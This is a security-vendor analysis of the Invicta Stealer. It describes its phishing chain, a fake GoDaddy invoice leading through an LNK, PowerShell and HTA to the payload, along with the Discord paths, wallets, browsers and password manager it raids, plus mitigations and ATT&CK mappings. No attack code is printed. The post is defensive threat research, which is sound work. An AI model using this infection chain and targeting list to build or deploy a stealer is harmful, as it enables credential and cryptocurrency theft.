Invicta Stealer GoDaddy

Invicta Stealer Spreading Through Phony GoDaddy Refund Invoices

Threat Actor Releases Free Builder to Boost Popularity and Inflict Damage

It is apparent from past evidence that threat actors (TAs) utilize social media platforms to demonstrate their technical expertise to attract potential allies or customers interested in acquiring or leasing malware families such as Stealers, Ransomware, RATs, and similar tools.

The primary motivation behind such actions is to generate monetary gains or seek collaborations for engaging in highly profitable cyber-attacks. This pattern underscores the role of social media as a tool for connecting with like-minded individuals and facilitating the pursuit of lucrative cybercrime activities.

Cyble Research and Intelligence Labs (CRIL) came across a new stealer named Invicta Stealer. The developer behind this malware is extensively engaged on social media platforms, utilizing them to promote their information stealer and its lethal capabilities.

The figure below shows the Telegram channel created by TAs to promote the stealer.

Figure 1 – Invicta Stealer Telegram Channel

Additionally, the TA has created a YouTube Channel where they demonstrate a video tutorial detailing the steps to create the Invicta Stealer executable using a builder tool available in the Github repository.

The Invicta Stealer can collect system information, system hardware details, wallet data, and browser data and extract information from applications like Steam and Discord.

The GitHub post by the TA, illustrated in the figure below, highlights their active promotion of the Invicta Stealer and its functionalities.

Figure 2 – GitHub Post of Invicta Stealer

The GitHub post includes a noteworthy detail: the malware developer generously offers a free stealer builder alongside the provided information. When running the builder executable, users are prompted to input a Discord webhook or server URL, which serves as the command and control (C&C) mechanism.

The figure below illustrates the Invicta Stealer builder.

Figure 3 – Invicta Stealer Builder

CRIL has noticed a significant increase in the prevalence of the Invicta Stealer due to its builder availability on the GitHub page, leading to numerous TAs actively employing it to infect unsuspecting users.

The figure below shows the statistics of Invicta Stealer samples identified in the wild.

Figure 4 – Increased Activity of Invicta Stealer

Infection Chain

The infection begins with a spam email with a deceptive HTML page designed to appear as an authentic refund invoice from GoDaddy, aiming to trick the recipients.

The figure below shows the phishing HTML page.

Figure 5 – Phishing HTML Page

Upon opening the phishing HTML page, users are instantly redirected to a Discord URL, initiating the download of a file named “”. The figure below illustrates the HTML page’s redirection process to the Discord URL to download “”.

Figure 6 – Browser Redirecting to Download Compressed File

Inside the “” archive file, there is a shortcut file named “INVOICE_MT103.lnk”. When the user opens this .LNK file, it triggers a PowerShell command that runs a .HTA file hosted on the TAs Discord server. The figures below depict the .LNK file and the PowerShell command.

Figure 7 – Details of the Malicious Link File

This HTA file contains VBScript code that, in turn, executes a PowerShell script. The PowerShell script is responsible for downloading an extremely malicious Invicta Stealer disguised as “Invoice_MT103_Payment.exe”.

The figure below shows the malicious PowerShell Command.

Figure 8 – Malicious PowerShell Command

The figure below depicts the entire infection chain of the Invicta stealer, illustrating the step-by-step progression from the initial infection to the delivery of the final payload.

Figure 9 – Invicta Stealer Infection Chain

Technical Analysis

For our analysis of Invicta stealer capabilities, we obtained a 64-bit GUI binary of the malicious Invicta Stealer from the wild. Its SHA256 hash is 067ef14c3736f699c9f6fe24d8ecba5c9d2fc52d8bfa0166ba3695f60a0baa45.

The figure below displays the details of the Invicta Stealer that CRIL analyzed.

Figure 10 – Invicta Stealer File Details

Anti-VM techniques

To obscure the reversing process, the stealer employs several techniques. The developers utilize encrypted strings to conceal important information, and crucial operations are executed using SYSCALLS, making it harder to analyze the code. Additionally, the stealer leverages multithreading to carry out multiple malicious activities simultaneously.

The figure below illustrates the assembly code responsible for the execution of SYSCALLS.

Figure 11 – Invicta Stealer Implementing SYSCALLS

Targeting System Information

Upon execution, the stealer collects an extensive array of system information. This includes details such as the computer name, system username, system time zone, system language, operating system version, and names of running processes. Additionally, the stealer employs techniques to extract system hardware information, such as the main memory size, number of CPU cores, screen resolution, hardware ID, IP address, and Geo IP details. Once the system information is extracted, the stealer consolidates the collected data into a single text file named “sys_info.txt”. This file is then stored in memory and will be exfiltrated in the later stage of execution.

Figure 12 – sys_info.txt File Containing the System Details

Targeting Discord

Upon retrieving essential system information, the stealer proceeds to verify the presence of the Discord application on the targeted system. To accomplish this, the stealer enumerates three specific paths within the system. This enumeration aims to confirm the installation of Discord and, if it is indeed present, proceed with the extraction of its data. The paths enumerated by the Invicta Stealer are:

  • C:\Users\<user>\AppData\Roaming\discord\Local Storage\leveldb
  • C:\Users\<user>\AppData\Roaming\discordptb\Local Storage\leveldb
  • C:\Users\<user>\AppData\Roaming\discordcanary\Local Storage\leveldb

The figure below shows the Invicta Stealer targeting Discord.

Figure 13 – Invicta Stealer Targeting Discord

Targeting Wallets

Once Discord is targeted, the stealer enumerates the installed cryptocurrency wallets within the system. This enumeration process involves identifying and listing the various wallets present.

The figure below showcases the specific code segment where the stealer performs the wallet enumeration.

Figure 14 – Invicta Stealer Targeting the Crypto Wallets

The below table shows all the wallets targeted by the Invicta Stealer:

CloakCoinElectrumGMultiBitHDExodus Eden
Electrum-LTCElectrum-Smartcom.liberty.jaxxDaedalus Mainnet
ark-desktop-walletNano Wallet Desktop 

Targeting Browsers

Following the targeting of cryptocurrency wallets, the stealer focuses on the user’s browser to steal sensitive data. This data includes the leveldb folder, autofill data, cookies, credit card details, downloads, browsing history, keywords, and login data.

The figure below illustrates the code snippet where the stealer conducts the enumeration of browser data.

Figure 15 – Stealer Enumerating the Browsers

The stealer targets the following browsers to steal information:

QIP SurfBraveSoftwareBliskTorch
7StarAmigoOpera StableYandex
Comodo DragonChedotGoogle ChromeCocCoc Browser
SlimjetChromePlusElements BrowserSleipnir
ChromiumUran360BrowserOpera Neon
CentBrowserEpic Privacy BrowserMicrosoft Edge 

After confirming the presence of the targeted browser within the system, the stealer initiates the process of extracting data from it. The extracted data is then stored in memory, preparing it for the subsequent exfiltration stage. The figure below illustrates the code snippet the stealer employs to steal login data from the Edge browser specifically.

Figure 16 – Invicta Stealer Targeting Login Data

The figure below shows stolen data from the browsers installed on the victim’s machine.

Figure 17 – Invicta Stealing the Browser Data from System

Targeting Steam

Simultaneously with the theft of browser data, the stealer also directs its attention toward the Steam gaming application. Its objective is to steal crucial information such as active gaming sessions, usernames, and a comprehensive list of games installed by the user on the system.

The figure below displays the specific code segment in which the stealer targets the Steam application.

Figure 18 – Invicta Stealer Targeting Steam Gaming Application

Targeting Password Manager

Following the extraction of Steam data, the stealer then shifts its focus towards targeting the KeyPass password manager. KeyPass is a password management application that centralizes and manages passwords for various websites and applications in one location.

The figure below showcases the code segment targeting the KeyPass password manager.

Figure 19 – Invicta Stealer Targets KeyPass Password Manager

Installed Applications and Users

Next, the Invicta Stealer initiates the process of extracting user account details, including the applications associated with those accounts. It gathers the names and versions of these applications and saves the collected information in memory, creating a text file named “installed.txt”, as depicted below.

Figure 20 – Stealer Extracting the Installed Application Details

Stealing Important Files

Following the enumeration of installed applications, the stealer advances towards stealing files from the Desktop and Documents folders. Specifically, the figure below depicts the routine employed by the stealer to target and extract text files from the Desktop folder.

Figure 21 – Invicta Stealer Targeting the Files in the System

As the stealer actively collects the targeted data, it temporarily stores the acquired files in the system’s memory. Once the necessary enumerations are completed, the stealer progresses to create a compressed zip file that encapsulates all the stolen files residing in memory.

This zip file is generated within the system’s temporary folder and is assigned a random name, which has the hardware ID of the victim’s system for identification purposes.

The figure below presents an illustration of the zip file.

Figure 22 – Invicta Stealer Creating Zip File Containing Stolen Data

After successfully completing the data theft process, the stealer proceeds to carry out the next step by sending the stolen data to the designated C&C server or Discord webhook.


We have observed an ongoing trend where malware developers create and offer a wide range of stealers to potential buyers and affiliates. Among these, the Invicta Stealer stands out as an extremely potent threat due to its ability to target multiple categories of highly sensitive information across several applications and browsers.

This stolen data can be leveraged by attackers for financial gain, as well as for launching attacks on other individuals or organizations using the compromised information. It is crucial to acknowledge the severity of this threat and take appropriate measures to protect against such malicious activities.

Our Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices as mentioned below:   

  • Avoid downloading pirated software from warez/torrent websites. The “Hack Tool” present on sites such as YouTube, torrent sites, etc., mainly contains such malware.
  • Use strong passwords and enforce multi-factor authentication wherever possible. 
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
  • Refrain from opening untrusted links and email attachments without first verifying their authenticity. 
  • Educate employees on protecting themselves from threats like phishing/untrusted URLs.
  • Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
  • Monitor the beacon on the network level to block data exfiltration by malware or TAs.
  • Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.

MITRE ATT&CK® Techniques

Tactic Technique ID Technique Name 
Execution T1204 User Execution 
Defense Evasion T1027Obfuscated Files or Information
Credential Access   T1528
Steal Application Access Token   
Credentials from Password Stores
Discovery   T1010
Application Window Discovery
File and Directory Discovery
CollectionT1005Data from Local System
Command and Control   T1071Application Layer Protocol   

Indicators of Compromise (IOCs)

Indicators Indicator Type Description 
Malicious Phishing html
Shortcut Link File
Malicious HTA File
Invicta Stealer Executable
Invicta Stealer Executable
Invicta Stealer Executable
Invicta Stealer Executable
Invicta Stealer Executable
Invicta Stealer Executable

Comments are closed.

Scroll to Top